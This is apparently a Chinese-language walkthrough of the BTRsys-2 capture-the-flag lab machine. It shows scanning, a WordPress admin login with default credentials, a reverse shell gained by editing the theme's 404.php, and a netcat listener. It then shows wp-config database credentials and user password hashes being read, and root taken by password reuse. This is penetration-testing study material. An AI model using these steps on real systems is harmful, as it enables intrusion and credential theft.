BTRsys-2 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.153
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-18 01:26 EDT
Nmap scan report for 192.1.1.153
Host is up (0.00062s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:96:CA:48 (VMware)

开放了 21,22,80 端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80 192.1.1.153           
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-18 01:27 EDT
Nmap scan report for 192.1.1.153
Host is up (0.00035s latency).

PORT   STATE SERVICE VERSION                                                                                        
21/tcp open  ftp     vsftpd 3.0.3                                                                                   
| ftp-syst:                                                                                                         
|   STAT:                                                                                                           
| FTP server status:                                                                                                
|      Connected to ::ffff:192.1.1.128                                                                              
|      Logged in as ftp                                                                                             
|      TYPE: ASCII                                                                                                  
|      No session bandwidth limit                                                                                   
|      Session timeout in seconds is 300                                                                            
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 08:ee:e3:ff:31:20:87:6c:12:e7:1c:aa:c4:e7:54:f2 (RSA)
|   256 ad:e1:1c:7d:e7:86:76:be:9a:a8:bd:b9:68:92:77:87 (ECDSA)
|_  256 0c:e1:eb:06:0c:5c:b5:cc:1b:d1:fa:56:06:22:31:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn\'t have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_Hackers
MAC Address: 00:0C:29:96:CA:48 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

发现了 robots.txt，允许 ftp 匿名登录，Ubuntu 操作系统。查看 ftp 中是否有敏感文件

┌──(kali㉿kali)-[~]
└─$ ftp 192.1.1.153                                                                   
Connected to 192.1.1.153.
220 (vsFTPd 3.0.3)
Name (192.1.1.153:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls -liah
229 Entering Extended Passive Mode (|||7107|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        118          4096 Mar 20  2017 .
drwxr-xr-x    2 0        118          4096 Mar 20  2017 ..
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> exi
221 Goodbye.

ftp 中空空如也

目录爆破

尝试目录爆破，同时访问 robots.txt

┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.1.1.153/   
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.1.1.153/

[01:59:54] Starting: 

[01:59:58] 200 -  224B  - /CHANGELOG                                        
[01:59:58] 200 -   34KB - /COPYING                                          
[01:59:58] 200 -    1KB - /INSTALL                                          
[01:59:59] 200 -    2KB - /LICENSE                                          
[01:59:59] 200 -  954B  - /README.md                                        
[02:00:12] 200 -   81B  - /index.html                                       
[02:00:13] 301 -  315B  - /javascript  ->  http://192.1.1.153/javascript/   
[02:00:19] 200 -    1KB - /robots.txt                                       
[02:00:20] 403 -  299B  - /server-status                                    
[02:00:20] 403 -  300B  - /server-status/                                   
[02:00:23] 301 -  311B  - /upload  ->  http://192.1.1.153/upload/           
[02:00:23] 500 -   67B  - /upload/                                          
[02:00:25] 200 -    2KB - /wordpress/wp-login.php                           
[02:00:25] 200 -    8KB - /wordpress/

发现了 wordpress 路径，robots 中也是 wordpress 路径

wpscan 收集信息

访问此目录发现页面渲染有点问题，不过问题不大，尝试 wpscan 来收集信息

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://btrisk.com/wordpress/ -e ap,u                                     
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | |_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://btrisk.com/wordpress/ [192.1.1.153]
[+] Started: Mon Sep 18 02:05:54 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://btrisk.com/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://btrisk.com/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://btrisk.com/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://btrisk.com/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
 | Found By: Rss Generator (Passive Detection)
 |  - http://btrisk.com/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
 |  - http://btrisk.com/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator>

[+] WordPress theme in use: twentyfourteen
 | Location: http://btrisk.com/wordpress/wp-content/themes/twentyfourteen/
 | Latest Version: 3.6
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Style URL: http://btrisk.com/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | The version could not be determined.

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://btrisk.com/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://btrisk.com/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] btrisk
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

尝试搜索插件漏洞

发现本地文件包含漏洞是可以存在的，而 SQL 注入漏洞利用有点问题。

虽然有这个漏洞，但是无法访问到配置文件

wordpress 爆破

只能尝试一下爆破了，先试试 admin 账户

竟然成功了，用户名和密码都是 admin

编辑修改 404.php

反弹shell

提前开启监听，访问这个链接：http://btrisk.com/wordpress/wp-content/themes/twentyfourteen/404.php

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443                    
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.153] 48192
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 23:14:19 up 49 min,  0 users,  load average: 0.01, 0.13, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:96:ca:48 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.153/24 brd 192.1.1.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe96:ca48/64 scope link 
       valid_lft forever preferred_lft forever
$ uname -a
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
$ which python
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/$ sudo -l
sudo -l
[sudo] password for www-data:

提权

反弹成功。看一看网站根目录，东西挺多的，优先看 wordpress 目录吧，毕竟里面有配置文件

www-data@ubuntu:/var/www/html$ ls -alih
ls -alih
total 2.1M
 13578 drwxrwxrwx  5 root   root 4.0K Apr 27  2017 .
 13577 drwxrwxrwx  5 root   root 4.0K May  2  2017 ..
    46 -rw-rw-r--  1 btrisk 1000 859K Apr 26  2017 1.gif
 14397 -rw-rw-r--  1 btrisk 1000 1.1M Apr 27  2017 2.gif
 14955 -rw-rw-r--  1 btrisk 1000  41K Apr 24  2017 Btrisk1.JPG
 14956 -rw-rw-r--  1 btrisk 1000  85K Apr 24  2017 Btrisk2.JPG
 14957 -rw-rw-r--  1 btrisk 1000  224 Oct 11  2016 CHANGELOG
 14958 -rw-rw-r--  1 btrisk 1000  35K Oct 11  2016 COPYING
 14960 -rw-rw-r--  1 btrisk 1000 1.3K Oct 11  2016 INSTALL
 14961 -rw-rw-r--  1 btrisk 1000 1.7K Oct 11  2016 LICENSE
 14962 -rw-rw-r--  1 btrisk 1000  954 Oct 11  2016 README.md
141029 drwxrwxr-x  2 btrisk 1000 4.0K Apr 24  2017 hsperfdata_tomcat6
 14959 -rw-rw-r--  1 btrisk 1000   81 Apr 27  2017 index.html
 14963 -rw-rw-r--  1 btrisk 1000 1.5K Apr 25  2017 robots.txt
141032 drwxrwxr-x 13 btrisk 1000 4.0K Apr 24  2017 upload
 16411 drwxrwxr-x  5 btrisk 1000 4.0K Apr 27  2017 wordpress

www-data@ubuntu:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information
 * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don\'t have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
www-data@ubuntu:/var/www/html/upload$ su
su
Password: rootpassword!

su: Authentication failure

发现了数据库的密码，尝试 su 直接切换用户，但是密码不正确

查看数据库

进入数据库看看

www-data@ubuntu:/var/www/html/upload$ mysql -uroot -p
mysql -uroot -p
Enter password: rootpassword!

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3488
Server version: 5.7.17-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| deneme             |
| mysql              |
| performance_schema |
| phpmyadmin         |
| sys                |
| wordpress          |
+--------------------+
7 rows in set (0.00 sec)

deneme 中为空，那就只能看 wordpress 了

mysql> use wordpress
use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> select * from wp_users
select * from wp_users
    -> ;
;
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                        | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | root       | a318e4507e5a74604aafb45e4741edd3 | btrisk        | mdemir@btrisk.com |          | 2017-04-24 17:37:04 |                     |           0 | btrisk       |
|  2 | admin      | 21232f297a57a5a743894a0e4a801fc3 | admin         | ikaya@btrisk.com  |          | 2017-04-24 17:37:04 |                     |           4 | admin        |
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
2 rows in set (0.00 sec)

mysql> exit
exit
Bye

发现了另一个用户名和其密码哈希

密码重用

尝试直接切换为root

www-data@ubuntu:/var/www/html$ su
su
Password: roottoor

root@ubuntu:/var/www/html# cd /root
cd /root
root@ubuntu:~# ls
ls
root@ubuntu:~# ls -alih
ls -alih
total 32K
   16 drwx------  4 root root 4.0K Apr 28  2017 .
    2 drwxr-xr-x 22 root root 4.0K Mar 17  2017 ..
11416 -rw-------  1 root root  505 May  2  2017 .bash_history
   17 -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
16439 drwx------  2 root root 4.0K Apr 28  2017 .cache
14287 -rw-------  1 root root  215 Apr 27  2017 .mysql_history
16385 drwxr-xr-x  2 root root 4.0K Mar 21  2017 .nano
   18 -rw-r--r--  1 root root  148 Aug 17  2015 .profile

root 目录中没有 flag，结束战斗